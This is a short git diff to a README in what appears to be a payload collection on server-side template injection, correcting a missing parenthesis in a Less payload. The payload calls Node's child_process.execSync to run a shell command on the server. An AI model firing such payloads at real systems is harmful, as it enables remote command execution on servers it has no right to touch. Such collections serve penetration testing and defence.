diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md index d8d85221..1d65a243 100644 --- a/Server Side Template Injection/README.md +++ b/Server Side Template Injection/README.md @@ -569,7 +569,7 @@ Fixed by https://github.com/HubSpot/jinjava/pull/230 ```less body { - color: `global.process.mainModule.require("child_process").execSync("id"`; + color: `global.process.mainModule.require("child_process").execSync("id")`; } ```